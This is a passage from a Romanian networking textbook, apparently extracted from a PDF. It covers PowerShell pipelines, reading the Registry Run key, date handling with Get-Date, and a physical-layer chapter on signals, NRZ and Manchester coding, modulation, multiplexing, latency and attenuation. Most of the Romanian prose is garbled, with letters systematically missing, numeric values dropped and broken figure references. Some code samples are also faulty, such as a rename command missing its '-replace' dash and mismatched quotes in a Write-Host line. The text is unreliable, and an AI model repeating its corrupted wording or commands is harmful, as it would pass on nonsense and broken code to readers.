serviciu este „Running şi, î az afi ati , i se afişează u ele o plet.
Î i te io ul i st u ţiu ii if se e a ă două ele e te oi: otaţia $_ şi „. pu tul .
Variabila $_ ep ezi tă o a ia ilă de siste defi ită auto at. Î i te io ul u ui pipe, ea eţi e
elementul u e t di „flu ul t e ut p i a el pipe (elementul curent din pipeline). În exemplul
de faţă, la fie a e ite aţie a epetiţiei, $_ a efe e ţia pe â d fie a e o ie t de tip se i iu di
ole ţia etu ată de Get-Service. Notaţia „. ep ezi tă eferirea la un membru al unui
o ie t a î Ja a sau î st u tu ile C . Fie a e o ie t a e u set de p op ietăţi; sp e e e plu,
u o ie t de tip se i iu deţi e p op ietăţi a status, name şi displayname, printre multe
altele. Accesarea unei astfel de proprietăţi se fa e p i ope ato ul pu t astfel:
.<nume_proprietate>.
La fel a şi $_, e istă şi alte a ia ile defi ite auto at î siste :
 $_ Co ţi e o ie tul u e t di pipe.
 $? Co ţi e aloa ea True da ă ulti a ope aţie s-a î heiat u su es şi False altfel.
 $Home Di e to ul utilizato ului u e t, e hi ale tul o ate ă ii a ia ilelo de ediu
%homedrive% şi %homepath%
 $LASTEXITCODE Codul de ieşi e al ulti ei e e uţii
 $PsHome Directorul de instalare a PowerShell
 $Host Co ţi e i fo aţii desp e ediul î a e ulează o sola u e tă
Fie e e plul u ăto :
1
În exemplul do..while u este a ătată aloa ea u a e este i iţializată a ia ila $a. Implicit,
valoarea acesteia este $NULL. E istă a u ite opti iză i pe t u lu ul u a eastă aloa e, a sp e e e plu $a++,
î o diţiile î a e $a este $NULL, va returna valoarea 1, dar nu este recomandabil lucrul cu variabile
ei iţializate.
28 | ‘ e ţ e l e L o a l e
Get-ChildItem D:\Logs\* -include *.txt |

foreach {move-item $_ ($_ replace(".txt",".bak"))}
Codul de ai sus o ţi e o listă a tutu o fişie elo u e te sia .txt din directorul
D:\Logs\ şi o t i ite u ui iclu foreach a e ite ează pe fie a e ele e t şi ulează o a da
move-item u doi pa a et i: p i ul a â e u ele fişie ului p i it di pipe iar al doilea
ep ezi tă tot u ele fişie ului u e t, da u e te sia .txt su stituită î .bak. Cu alte
cuvinte, co a da ede u eşte toate fişie ele te t di D:\Logs\ schimbându-le extensia .txt
în .bak.
0.3.2.13 PowerShell şi Wi do s Registr

Modifi a ea o figu aţiei di Wi do s ‘egist poate fi deseo i o sa i ă a u ui
ad i ist ato . Deseo i, pe t u efe tua ea de odifi ă i î ‘egist se foloseşte utilita ul
regedit.exe sau, în cazul scripturilor (non-PowerShell , se poate folosi şi utilita ul î li ie de
o a dă reg.exe. Totuşi i te a ţiu ea u Wi do s ‘egist se poate fa e fa il şi p i
PowerShell deoarece acesta tratează ‘egist -ul a pe u siste de fişie e lu u i tuiti ,
ţi â d o t a a e o o ga iza e a o es e tă .
Una dintre cele mai des accesate chei din Registry este cheia Run, a e sto hează ăile
spre executabilele ce sunt lansate automat la pornirea sistemului1. Pentru a naviga spre
a easta se e e ută o e zile:
PS C:\Users\Administrator> cd HKLM:
PS HKLM:\> cd SOFTWARE\Microsoft\Windows\CurrentVersion\Run
După u se o se ă, Wi do s ‘egist este o side at a fii d o u itate u drive)

separat, numit HKLM (Hive Key Local Machine). Registry-ul este î pă ţit î ai ulte zo e
2
logice, denumite hive-u i, e poa tă de u i ile di Wi do s API şi p es u tă i a HKLM
(...Local Machine), HKCU (...Current User), HKCR (...Classes Root), HKU (...Users), etc.
Cu toate ă ‘egist -ul este t atat a u a o e, te tati a de a afişa o ţi utul heii Run
printr-un simplu dir a etu a doa ezultatul u ăto :
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> dir
Hive:
Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersio
n\Run
SKC VC Name Property
--- -- ---- --------
3 1 OptionalComponents {(default)}
A est lu u se î tâ plă deoa e e doa heile su t onsiderate obiecte, valorile lor fiind
t atate a p op ietăţi. Aşada , pe t u o ţi e ea alo ii u ei hei se poate folosi o a da Get-
ItemProperty, eventual cu parametrul „. , adi ă di e to ul u e t, pe t u a afişa toate
alo ile heilo di lo aţia u e tă:
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> Get-ItemProperty .
[...]
PSChildName : Run
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
IntelliPoint : "C:\Program Files\Microsoft IntelliPoint\ipoint.exe"
SigmatelSysTrayApp : sttray.exe
Windows Defender : C:\Program Files\Windows Defender\MSASCui.exe -hide
SynTPEnh : C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
vmware-tray : C:\Program Files\VMware\VMware Workstation\vmware-tray.exe
1
Este vorba despre cheia Run din HKEY_LOCAL_MACHINE. E epţia o ep ezi tă heia Run din
HKEY_CURRENT_USER a e spe ifi ă e e uta ilele e o fi ulate doa â d utilizato ul se aute tifi ă î
sistemul de operare.
2
http://msdn.microsoft.com
29 | C u p r i n s
VMware hqtray : "C:\Program Files\VMware\VMware Workstation\hqtray.exe"

googletalk : C:\Program Files\Google\Google Talk\googletalk.exe /autostart
GrooveMonitor : "C:\Program Files\MicrosoftOffice\Office12\GrooveMonitor.exe"
Broadcom Wireless Manager UI : C:\Windows\system32\WLTRAY.exe
SunJavaUpdateSched : "C:\Program Files\Java\jre1.6.0_06\bin\jusched.exe"
0-9: Rezultatul afişării heii Run folosind PowerShell
În exemplele anterioare s-a lucrat direct în interiorul hive-ului HKLM. Pentru a schimba
lo aţia u e tă î u ul di t e elelalte hive-u i, este e esa ă î tâi o e ta ea la PowerShell
Registry Provider, u fel de ădă i ă a ‘egist -ului o epută spe ial pe t u PowerShell şi
de u ită REGISTRY::, a î e e plul u ăto :
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> cd registry::
PS Microsoft.PowerShell.Core\Registry::> ls
Hive:
SKC VC Name Property
--- -- ---- --------
7 0 HKEY_LOCAL_MACHINE {}
14 0 HKEY_CURRENT_USER {}
373 0 HKEY_CLASSES_ROOT {}
2 0 HKEY_CURRENT_CONFIG {}
0 2 HKEY_PERFORMANCE_DATA {Global, Costly}
6 0 HKEY_USERS {}
0-10: Hive-urile Registry-ului ăzute pri i ter ediul PowerShell Registry Provider
Un exemplu de utilizare al celorlaltor hive-u i este u ătoa ea se e ţă de od a e

afişează apli aţia aso iată u t ata ea u ei a u ite e te sii, î e e plul de ai jos, .mp3:
PS HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run> cd registry::
PS Microsoft.PowerShell.Core\Registry::> cd HKEY_CLASSES_ROOT\.mp3
PS Microsoft.PowerShell.Core\Registry::HKEY_CLASSES_ROOT\.mp3> Get-ItemProperty .
[...]
PerceivedType : audio
(default) : Winamp.File.MP3
Content Type : audio/mpeg
Winamp_Back : WMP11.AssocFile.MP3
0-11: Afişarea apli ației are tratează o a u ită e te sie
0.3.2.14 Ora şi data

Cal ula ea de i te ale de ti p, sele ţia fişie elo pe aza u ui i te al, o do a ea
o ologi ă, p e u şi ulte alte utiliză i ale i fo aţiilo legate de ti p su t deseo i utile î
scripturile folosite de administratorii de sistem.
P i ipala o a dă PowerShell pentru aflarea timpului este Get-Date1:
PS C:\Users\Administrator> Get-Date
Saturday, August 02, 2008 7:49:00 PM
Pe t u a sepa a data şi o a u e tă, se foloseşte pa a et ul DisplayHint lâ gă a e se

poate specifica date sau time:
PS C:\Users\Administrator> Get-Date -DisplayHint date
Saturday, August 02, 2008
PS C:\Users\Administrator> Get-Date -DisplayHint time
7:49:00 PM
1
De fapt, Get-Date etu ează deopot i ă i fo aţii legate de data şi o a u e tă. Nu e istă o
o a dă Get-Time ci doar parametri suplimentari ai lui Get-Date.
30 | ‘ e ţ e l e L o a l e
E istă şi etoda IsDaylightSavingTime() a e etu ează True sau False î fu ţie de

p eze ţă o ei de a ă. ‘ezultatul asup a ă uia se apli ă etoda este el al o e zii Get-
Date, a e t e uie î ad ată î t e pa a teze î ai te de a i se a esa etodele:
PS C:\Users\Administrator> (Get-Date).IsDaylightSavingTime()
True
O utiliza e f e e tă a datelo î scripting o ep ezi tă adăuga ea u ei astfel de i fo aţii

î u ele fişie elo , e ţi â du-le astfel o do ate. U ătoa ea se e ţă a ată odul î ae
se pot o ţi e oi u e pe t u fişie e, o ate â d data u e tă la u ele lo :
$filename = "fisier"
$datestring = Get-Date -uformat %Y%M%d
$newfilename = $filename + "_" + $datestring + ".txt"
Write-Host $newfilename
De e a at faptul ă, î li ia de fo ata e a datei, pa a et ul uformat provine de la

„UNIX format”. Pentru exemplul de mai sus, %Y ep ezi tă u a di pat u if e, a , %M
ep ezi tă o lu ă di două if e, a , ia %d o zi de două if e, a .
O listă pa ţială de odifi ato i a eptaţi la fo ata ea datei şi a o ei este u ătoa ea:
 C Impropriu de u it se ol e tu , de fapt e t age p i ele două if e ale a ului pe t u
2008)
 Y An de patru cifre
 b Numele prescurtat al lunii
 B Numele complet al lunii
 M Lu ă de două if e
 V Nu ă ul săptă â ii î i te alul ..
 a Numele prescurtat al zilei săptă â ii
 A Nu ele o plet al zilei săptă â ii
 u Nu ă ul zilei săptă â ii, î epâ d u o espu zăto lui lu i Monday)
 d )iua di lu ă î două if e
 j Ziua din an
 r Timpul în format de 12 ore
 T Timpul în format de 24 de ore
 p ante meridian (a.m.) sau post meridian (p.m.)
 H Ora în format de 24 de ore
 I Ora în format de 12 ore
 m Minute
 S Secunde
Calcularea datelor din trecut sau viitor se face tot prin metode aplicate lui Get-Date, ca în
e e plele de ai jos. “e o se ă ă s ăde ea u ităţilo de ti p se fa e p i a eleaşi etode,
dar argumente negative:
(Get-Date).AddMonths(3)
(Get-Date).AddHours(145)
(Get-Date).AddYears(-2)
Setarea datei se face prin comanda Set-Date u ată de pa a et ul date şi u şi e

des ie oua aloa e. Poate fi folosită şi î o i aţie u al ula ea ti pului î t e ut sau
viitor:
Set-Date -date "8/7/2008 12:00 AM"
Set-Date (Get-Date).AddHours(3)
Cal ula ea i te alului de ti p di t e două e e i e te este util î spe ial pe t u

ăsu a ea ti pului de ula e a u ui s ipt şi poate fi ealizată a î e e plul de ai jos:
$start = Get-Date
31 | C u p r i n s
<instrucţiuni>
$stop = Get-Date
$timediff = New-TimeSpan $start $stop
Write-Host “Scriptul a rulat “ + $timediff.milliseconds + " milisecunde."
0-12: Calcularea timpului de rulare a unui script
Bi eî ţeles, î e e plul de ai sus se pot folosi şi zile, o e, i ute, se u de, ticks precum
şi alte p op ietăţi î lo ul ilise u delo .
Pentru a calcula prin intermediul unui TimeSpan timpul dintre momentul u e t şi o dată
oa e a e di p eze t sau t e ut, se poate folosi o o a dă u si ta a u ătoa e:
New-TimeSpan $(Get-Date) $(Get-Date -month 1 -day 1 -year 2027)
Comanda Get-Date poate etu a o ie te u p op ietăţi e pli it spe ifi ate p i

intermediul parametrilor ca month, day sau year. Utiliza ea pa a tezelo este e esa ă î
e e plul de ai sus deoa e e se do eşte e alua ea lo î ai tea t a s ite ii ezultatelo a
parametrii pentru comanda New-TimeSpan.
32 | ‘ e ţ e l e L o a l e
1 Nivelul fizic
Ce se î vaţă din acest capitol:
 Tipu i de se ale folosite î eţele de al ulatoa e
 Medii de transmisie
 E hipa e te de eţea
Cine este...
Alexander Graham Bell este u i e tato și o de știi ţă e i e t, editat cu
inventarea telefonului. În 1881, primele cabluri torsadate (twisted pair) au fost folosite în
sistemele telefonice proiectate de Bell.
1.1 Semnale
La i el fizi , u itatea de o ga iza e a datelo este itul. Biţii pot fi ep eze taţi şi
t a s işi p i t -u a al de o u i aţie u ajuto ul se alelo . ‘olul fu da e tal al i elului
fizi este a ela de a t a sfo a se alul î iţi. Ştii d ă la i el fizi se lu ează doa u
semnale, sunt importante ijloa ele p i a e iţii pot fi t a spo taţi ât ai efi ie t.
Î ele e u ează vor fi prezentate di e se teh i i şi dispoziti e e fa posi ilă
opti iza ea t a sfe ului de iţi p i t -un canal fizic.
1.1.1 Tipuri de semnale
1.1.1.1 “e ale a alogi e şi digitale

La i elul el ai ge e al, u se al este u fe o e fizi ăsu a il, a e a iază î
spaţiu şi/sau ti p, utilizat pe t u a t a s ite i fo aţie. “e alele pot fi o ti ue sau
dis ete. De ase e ea, o lasifi a e f e e tă a se alelo este ea a alogi /digital.
“e alele digitale su t dis ete şi ua tizate – adi ă pot fi ep eze tate p i u e e u u
anumit nivel de precizie presta ilit. “e alele a alogi e su t o ti ue şi, teo eti , a putea fi
ep eze tate p i u e e doa u u i el i fi it de p e izie u u u ă i fi it de ze i ale .
Semnalele analogice, el ai adesea, su t ele î tâl ite î atu ă, u a fi o ea u a ă,
i ipitul păsă ilo , şuie atul â tului et . Atu i â d su t ep eze tate g afi ele sea ă ă u
işte alu i ai ult sau ai puţi si et i e. Cel ai si plu e e plu de se al a alogi este
o si usoidă Figu a Error! Reference source not found. . “e alele a alogi e a iază o ti uu
î ti p şi de a eea u au t e e i uşte de la o aloa e la alta: se ai spu e ă su t „wavy ,
adi ă u duioase .
Semnalele digitale, el ai adesea, su t ele folosite î teh i ă şi au la ază două alo i
logi e, şi , a e au fie a e âte o ep eze ta e î fu ţie de odul î a e su t t a s ise.
I pulsu ile digitale sau logi se u es iţi. T a s isia digitală este de ulte o i de
p efe at elei a alogi e deoa e e este ai puţi afe tată de zgo ote, fii d de i ai o ustă.
Dato ită t e e ilo uşte de la o aloa e la alta, se ai spu e ă este „jumpy , adi ă
săltă eaţă. “e alele digitale e ţi u i el o sta t de te siu e sau i te sitate lu i oasă,
apoi trec pe alt nivel constant.
E e plul si plu de ai jos ilust ează faptul ă t a s isia digitală e ai puţi afe tată de
zgo ote. Fie o li ie pe a e se do eşte t a s ite ea u ă ului . Da ă t a s isia este
a alogi ă, se a t a s ite p a ti o u dă, î e e plu de faţă amplitudi ea fii d de , da ă s-
a fi do it t a s ite ea u ă ului , a fi t e uit folosită o a plitudi e , , et . Da ă a ea
li ie este afe tată de i te fe e ţe ele t o ag eti e u a plitudi ea de , , atu i la e epţie
33 | N i v e l u l f i z i c
se a iti , , adi ă u ă ul . T a s isie e o ată! Da ă î s hi se foloseşte t a s isia

digitală, a t e ui o e tit î i a , ia u ă ul a fi t a s is digital. T a s isia poate
avea 2 valori: spre exemplu, logi î t e a plitudi ile , şi , şi logi î t e , şi . Da ă se
do eşte t a s ite ea lui logi de o i, p a ti o fi t a s ise i pulsu i u a plitudi ea
de , . Da ă la ele se adaugă i te fe e ţele p eze te pe li ie, la elălalt apăt o fi itite
i pulsu i de a plitudi e , eea e î sea ă tot logi . T a s isie o e tă! Este ade ă at ă
e istă u e oase azu i î a e dato ită i te fe e ţelo p ea a i se e ite şi se
e epţio ează sau i e s, î să, î o pa aţie u t a s isia a alogi ă, ea digitală este ult
ai p e isă şi ai o ustă.
Tipurile de semnale discutate mai jos sunt în marea lor majoritate digitale (acestea sunt
ele ai folosite î eţele de al ulatoa e ; atu i â d este o a desp e se ale a alogi e,
acest lucru va fi precizat explicit.
1-1: E e plu de se al a alogi şi digital
T e uie fă ută disti ţia î t e tipul se alului şi tipul datelo t a s ise folosi d a el
se al. La â dul lo , şi datele se î pa t î a alogi e sau digitale. Datele analogice sunt valori
o ti ue di ad ul u ui i te al e e plu: su etele di atu ă, î ălţi ea u ei oloa e de
mercur din termometru). Datele digitale su t alo i dis ete e e plu: u fişie te t, if ele
afişate pe e a ul u ui te o et u digital .
Un caz în care date analogice, cum ar fi vocea, sunt transmise printr-un semnal analogic,
este cel al telefonului clasic.
De o i ei, pe t u datele digitale se foloses se ale digitale. Da ă î să, se do eşte
transmiterea de date digitale printr-un mediu analogic, trebuie folosit un modem. Acesta preia
datele digitale de t a s is şi le odulează, ezultâ d u se al a alogi . La e epţie, apli â d
p o esul i e s, de odula ea, asup a se alului a alogi itit de pe ediu se o ţi datele
digitale.
34 | ‘ e ţ e l e L o a l e
Date Dispozitiv Semnal

Date
Semnal
analogice
analogic
(ex: voce) telefon
Date
Semnal
digitale
modem analogic
(ex: text)
Date Semnal
analogice codec digital
Date Semnal
digitale digital transceiver digital
1-2: Date analogice/digitale, semnal analogic/digital
Tehnologia Voice over IP permite transferul datelor analogice prin semnale digitale.
Codificarea datelor se poate face software sau direct hardware.
1.1.1.2 Clasifi area se alelor î fu ție de odul de tra s isie

Î fu ţie de atu a ge e ato ului de se al şi a ediului î a e se p opagă, se alele
pot fi î pă ţite î t ei atego ii:
1.1.1.2.1 Semnale electrice

Semnalele electrice constau în impulsuri electrice ce folosesc ca suport pentru transmisie
fire de cupru.
1.1.1.2.2 Semnale optice

“e alele opti e se o ţi p i o e sia se alului ele t i î i pulsu i lu i oase a e
sunt transmise apoi printr-o fi ă opti ă.
1.1.1.2.3 Unde electromagnetice (unde radio, microunde)

Semnalele wireless fă ă fi se p opagă p i ae , su fo ă de u de adio sau i ou de.
1.1.2 Codarea
De-a lu gul ti pului au e istat u e oase fo e de t a spo t al i fo aţiei pe dista ţe
lu gi. Fie a e di t e a este etode a ea o a u ită fo ă de oda e a i fo aţiei. De
exemplu, indienii apache fă eau u fo a e pe u deal şi u ajuto ul u ei pătu i fo au
rotocoale de fum. O variantǎ de oda e folosită a putea fi: oto oale de fu î sea ă ă
este â at ult p i zo ă, oto oale a i şi două i i î sea ă ă i e fu tu a, et . Apa iţia
codului Morse a e oluţio at la e ea espe ti ă o u i aţiile: fie a e lite ă a ea p op iul ei
si ol fo at di se ale lu gi şi s u te.
P o esul de t a sfo a e a i fo aţiei î t -un semnal ce poate fi transportat pe un canal
fizi se u eşte codare.
T a s ite ea i fo aţiei î eţelele de al ulatoa e p esupu e apli a ea ai ulto
procese de codare la diferite niveluri ale stivei OSI – precum segmentarea datelor,
comprimarea datelor sau criptarea. Desigu , pe t u a t a s ite i fo aţia, a easta t e uie
o e tită î t -u se al digital i a . La i elul fizi , pasul u ăto o stă î oda ea

semnalului binar într-un alt semnal adecvat mediului fizic – p e u a iaţii ale i elului de
tensiune într-u a lu de up u, sau a iaţii ale lu i ozităţii î t -o fi ă opti ă. Mai jos su t
prezentate câteva metode de codare ale semnalelor binare în semnale fizice.
1.1.2.1 Sincronizarea cu ceas
1.1.2.1.1 NRZ-L
În codarea Non-Return-to-Zero Level aloa ea logi este t a s isă a o te siu e joasă
de o i ei egati ă, de e e plu î t e - V şi - V ia logi a u i el de te siu e î altă
poziti ă, de e e plu î t e V şi V . Î ep eze ta ea u ui şi de iţi i elul se alului
u ă eşte sta ea itului.
Un dezavantaj important al acestei metode de codare este riscul crescut de pierdere a
si o iză ii la e epto . T a s ite ea u ei se e ţe de date e o ţi e u u ă a e de iţi
o se uti i u a eeaşi aloa e p esupu e e ţi e ea te siu ii ai ult ti p pe a elaşi i el,
iar î azul desi o iză ii, u ă ul iţilo e epţio aţi poate fi e o at.
1.1.2.1.2 NRZI
În codarea Non-Return-to-Zero Inverted valoarea semnalului trece de pe un nivel pe altul
doa atu i â d î şi ul de iţi apa e aloa ea logi . Ca e e plu, da ă î sta ea u e tă
se alul se afla pe i elul de te siu e joasă, la apa iţia u ui it de aloa e , a t e e pe
te siu e î altă. Apa iţia u uia sau ai ulto iţi de u s hi ă î niciun fel nivelul de
te siu e. A esta a e e i la te siu e joasă doa pe t u a ep eze ta u ăto ul it de
î tâl it î şi .
1.1.2.2 Sincronizarea fără ceas
1.1.2.2.1 Manchester
Codarea Manchester foloseşte pe t u ep eze ta ea fie ă eia di t e ele două alo i
logi e âte o t a ziţie î t e i elu ile de te siu e. Astfel, o t e e e sus-jos odifi ă u it 0, în
timp ce un bit 1 este codificat printr-o trecere jos-sus. T a ziţiile au lo la ijlo ul elulei de
it, eea e î sea ă ă, da ă se pie de si o iza ea, pot fi folosite atât a date ât şi a
semnal de ceas. De e e plu, da ă este folosită oda ea NRZ-L şi t e uie t a s işi de iţi de
1 logic, atunci ar fi necesare 20 de impulsuri de tensiune -5V. S-a putea î să a la e epţie,
dato ită tutu o fe o e elo dis utate pâ ă a u , să fie itiţi iţi sau de iţi. Folosi d
codarea Manchester, u de fie a e it e o t a ziţie, su t t i ise p a ti ai ulte i pulsu i
ele t i e, î să la e epţie o fi itite tot de t a ziţii.
Codarea Manchester este utilizată î ad ul sta da dului IEEE . Ethernet).
1.1.2.2.2 Ma hester difere ţial

Manchester difere ţial este o etodă de oda e î a e datele su t o i ate u
se alele de eas pe t u a fo a u şi de date u autosi o iza e. A eastă etodă
foloseşte t a ziţia di ijlo ul elulei de it doa a şi se al de eas. Pe t u a ep eze ta ,
p i a ju ătate a elulei de it u e te este egală u ulti a ju ătate a itului p e ede t.
Pe t u a odifi a , se i e sează i elul de te siu e e iste t î ea de-a doua ju ătate a
semnalului anterior. Cu alte cuvinte, un bit 0 este reprezentat printr-o t a ziţie la începutul
elulei de it, a se ţa a estei t a ziţii se ifi â d logi .
Manchester dife e ţial este utilizat î ad ul sta da dului . Token Ring).
36 | ‘ e ţ e l e L o a l e
Pentru exemplificare, în figura 1-3 este ep eze tată odarea caracterului K în cele patru
variante discutate.
Ca a te ul A î he aze i al a e aloa ea . Cu lite a K se află la o dista ţă de
lite e de A, î sea ă ă ep eze ta ea lui K î he a este B.
A = 0x41, B = 0x42, ..., I = 0x49, J = 0x4A,
K = 0x4B
Rep eze ta ea i a ă:
4(16) = 4(10) = 0100(2)
B(16) = 11(10) = 1011(2)
‘ep eze ta ea i a ă pe t u lite a K este .
clock
date
NRZ - L
NRZI
Manchester
Manchester
dife e ţial
1-3: Metode de codare
1. Codarea NRZ-L - da ă u it este , se alul este pe i elul de te siu e joasă, da ă bitul este
, se alul t e e pe te siu e î altă
2. CodareaNRZ-I - se alul s hi ă i elul de te siu e doa â d u ează u it .
3. Codarea Manchester – este odifi at a o t a ziţie sus-jos, a t a ziţie jos-sus
4. Codarea Manchester dife e ţial - T a ziţia de la î eputul se alului i di ă u it .
1.1.3 Modularea
Modularea se efe ă la odifi a ea u ui se al folosi d u alt se al. Î t -o transmisie
adio se alul u ajuto ul ă uia este t a spo tată i fo aţia este o u dă, de e e plu o
si usoidă. T a s iţăto ul e ite î pe a e ţă o si usoidă a a te izată de a plitudi e,
f e e ţă şi fază u toţi pa a et ii o sta ţi. Î a est az, a titatea de i fo aţie este ulă,
adi ă pe a eastă si usoidă u este t a s isă niciun fel de i fo aţie utilă. Î o e tul î
ca e î epe t a s isia datelo , se alul util de date, adi ă iţii, su t folosiţi pe t u a a ia
parametrii sinusoidei. Cu alte cuvinte, datele - adi ă iţii – se ep ezi tă p i odifi ă i ale
si usoidei i iţiale. Cu , sau ai e a t, e t e uie odifi at la si usoidă? Pot fi odifi aţi

u ăto ii pa a et i:
 amplitudinea: modulare AM - amplitude modulation;
 f e e ţa: odula e FM - frequency modulation;
 faza: modulare PM - phase modulation.
Modularea este p o esul de o pu e e a u ei u de pu tătoa e u u set de date.
1-4: Modulare î a plitudi e AM , fre e ță FM , fază PM
Desigu , e istă fo e ult ai a a sate de odula e, î să ele t ei p eze tate ai sus

ep ezi tă azele odulă ii se alelo .
Datele di al ulato fii d digitale, pe t u o i e fel de o u i aţie t e p i p o esul de
oda e. Da ă ediul de t a s isie folosit este tot digital de e e plu a lu UTP , datele su t
puse di e t pe ediu, fă ă a ai fi e oie de odula e. Pe t u t a s isiile pe legătu i se iale
sau pe a lu oa ial a fi folosită atât oda ea ât şi odula ea.
1.1.4 Multiplexarea
Multiplexarea este procedeul prin care mai multe canale de date sunt combinate într-un
singur canal fizic. Demultiplexarea este procesul invers multiple ă ii, de sepa a e a a alelo
i iţialedi a alul fizi .
E istă u e oase teh i i de ultiple a e, î t e a e se u ă ă:
 TDM (Time Division Multiplexing : i fo aţiilo di fie a e a al de date li se alo ă o ua tă de
ti p p edefi ită, i dife e t da ă pe acele canale se transmite sau nu.
 ATDM (Asynchronous time-division multiplexing : i fo aţiilo di fie a e a al de date li se
alo ă o ua tă de ti p a ia ilă, î fu ţie de u ă ul de a ale utilizate î a el o e t.
 FDM (Frequency Division Multiplexing : fie a e a al p i eşte o a u ită a dă de f e e ţă.
 Statistical multiplexing - Ba da este alo ată î od di a i fie ă ui a al a e a e i fo aţii
de transmis.
 DWDM (Dense Wavelength Division Multiplexing este o fo ă de ultiple a e dez oltată
pe t u t a s isia pe fi ă opti ă. DWDM este e hi ale tul opti al ultiple ă ii FDM.
38 | ‘ e ţ e l e L o a l e
A este tipu i de ultiple ă i se efe ă la ă i ea fizi ă e stă la aza sepa aţiei a alelo .
De e e plu, î azul ultiple ă ii TDM, fie ă ui a al de o u i aţie i se alo ă o ua tă de
ti p, ia î azul FDM, fie ă ui a al i se alo ă o a u ită a dă de f e e ţă.
1.1.5 Caracteristici ale semnalului
1.1.5.1 Latenţa
Late ța, u ită şi î tâ zie e, este de două tipu i: late ţa p opagă ii p i ediul de
t a s isie şi late ţa t e e ii p i e hipa e tele de eţea.
P i ul tip de late ţă este dat de iteza de p opaga e a se alului î ediul de t a s isie
spe ifi şi de dista ţa î t e su să şi desti aţie. De e e plu, pe t u o t a s isie p i ediul
electric viteza de propagare a semnalului este ap o i ati două t ei i di iteza lu i ii.
A easta î sea ă ă u i puls ele t i a pa u ge u seg e t de eţea de î
 0,5  10 6 secunde.
100
(  3  10 8 )
2
3
A doua su să a late ţei o ep ezi tă e hipa e tele de eţea folosite pe pa u s. Fie a e
echipa e t e e ută ope aţii spe ifi e, de la ed esa ea se alului ele t i , pâ ă la
dete i a ea ăii opti e pe a e t e uie t i is fie a e pa het. Late ţa dispoziti elo de
i te o e ta e a iază de la âte a i ose u de î azul hu ului şi a o e toa elor de
ediu, pâ ă la ilise u de î azul o utatoa elo şi a outerelor. Astfel, comparativ cu
late ţa i t odusă de u epeto Ethernet, de ap o i ati , i ose u de, late ţa ediului
de o e ta e este u u o di de ă i e ai i ă.
Late ţa p opagă ii este î ge e al se ifi ati ai i ă de ât late ţa dispoziti elo de
i te o e ta e, astfel î ât deseo i este o side ată d ept eglija ilă. Cu toate a estea, e istă
azu i î a e late ţa p opagă ii este fa to ul p i ipal al î tâ zie ii totale a u ui semnal, cel
ai ele a t e e plu fii d el al o u i aţiilo p i satelit. Folosi ea sateliţilo geostaţio a i
fa e a d u ul total î t e su să şi desti aţie să fie de peste . k , adu â d late ţa totală
a o i ă ei t a s isiu i î ju ul alo ii de , secunde.
1.1.5.2 Atenuarea
„Ate ua ea este u te e ge e al a e se efe ă la edu e ea pute ii u ui se al.
Atenuarea are loc indiferent de tipul de semnal, analogic sau digital. Nu ită u eo i şi
„pie de e loss , ate ua ea este o o se i ţă a t a s ite ii se alului la dista ţe a i.
Ate ua ea afe tează eţelele de al ulatoa e deoa e e li itează dista ţa a i ă î t e
dispoziti ele a esteia. Da ă dista ţa este p ea a e, di auza ate uă ii, la desti aţie u se a
mai putea interpreta semnalul corect.
1-5: Atenuarea semnalului

Pe t u t a s isia la dista ţe ai a i de ât pe ite tipul de a lu utilizat se foloses

anumite dispozitive, numite repetoare, a e ege e ează se alul din punct de vedere
electric, optic sau wireless . Ate ua ea afe tează toate tipu ile de edii de t a s isie, î să a e
valori diferite pentru fiecare mediu în parte. De exemplu, un semnal electric transmis pe un fir
de up u se ate uează ai epede de ât u se al opti t a s is pe o fi ă opti ă .
Ate ua ea î ge e al se ăsoa ă î de i eli dB , ia ate ua ea spe ifi ă u ui a u it tip de
a lu se ăsoa ă î de i eli/ et u sau de i eli/kilo et u. Fie a e tip de a lu a e o ate ua e
spe ifi ă. Cu ât a eastă ate ua e este ai i ă, u atât a el a lu este o side at ai u .
Ate ua ea este u fa to foa te i po ta t de luat î al ul î azul p oie tă ii eţelelo de fi ă
opti ă. E hipa e tele de fi ă opti ă ga a tează o a u ită dista ţă spe ifi ată î artea
teh i ă , î să a eastă dista ţă este ga a tată pe t u o fi ă opti ă u o a u ită ate ua e / k
spe ifi ată tot î a tea teh i ă . Da ă se foloseşte o fi ă opti ă u o ate ua e ai a e,
atu i dista ţa a i ă ga a tată a fi ai i ă. Da ă î să se foloseşte fi ă opti ă de o ai
u ă alitate, t a s isia a fi o e tă şi la dista ţe ai a i de ât ea spe ifi ată.
Cu se dete i ă dista ţa a i ă posi ilă pe t u o t a s isie?
E hipa e tele i pu o a u ită aloa e a ate uării care nu trebuie depăşită. Se poate
considera ă:
1.1.5.3 Reflexia
‘efle ia a e lo de o i ei atu i â d u se al î tâl eşte o li ie de sepa aţie î t e două
edii. Atu i, o a u ită pa te di se al se efle tă î apoi î ediul di a e a e it şi o
pa te t e e î ediul u ăto .
‘efle ia poate apă ea î azul se alelo ele t i e â d, de e e plu, i pulsu ile ele t i e
sau iţii î tâl es o dis o ti uitate, o e t î a e o a u ită pa te di e e gia se alului se
efle tă. Da ă u este o t olată, a eastă e e gie poate i te fe a u iţii t a s işi ai tâ ziu.
Milioa e de iţi su t t a s işi î fie a e se u dă, ia a eastă e e gie efle tată poate du e la
ulte t a s isii e euşite. U e e plu este o eţea pe a lu oa ial a e a e e oie de u
te i ato la fie a e apăt. Da ă u a a ea a est te i ato , la apătul a lului a apă ea o
li ie de sepa a e î t e ele două edii ae şi up u , ia o pa te di e e gie s-ar reflecta înapoi
în firul de cupru.
‘efle ia poate a ea lo şi î azul siste elo opti e. U se al opti se efle tă o i de âte
o i î tâl eşte o dis o ti uitate î fi a de sti lă, a de e e plu atu i â d se ataşează un
o e to . De a eea este e esa ă o p egăti e spe ială î azul ataşă ii o e to ilo de fi ă
opti ă, pe t u a u pe ite efle ia lu i ii î apoi î fi ă.
1.1.5.4 Zgomotul
Zgomotul este o cantitate de energie edo ită ele t i ă, ele t o ag eti ă sau adio a e
poate deg ada alitatea se alului t a s is. )go otul afe tează atât t a s isiile a alogi e
ât şi ele digitale. Î azul se alelo a alogi e, se alul de i e uiat şi uşo defo at. U
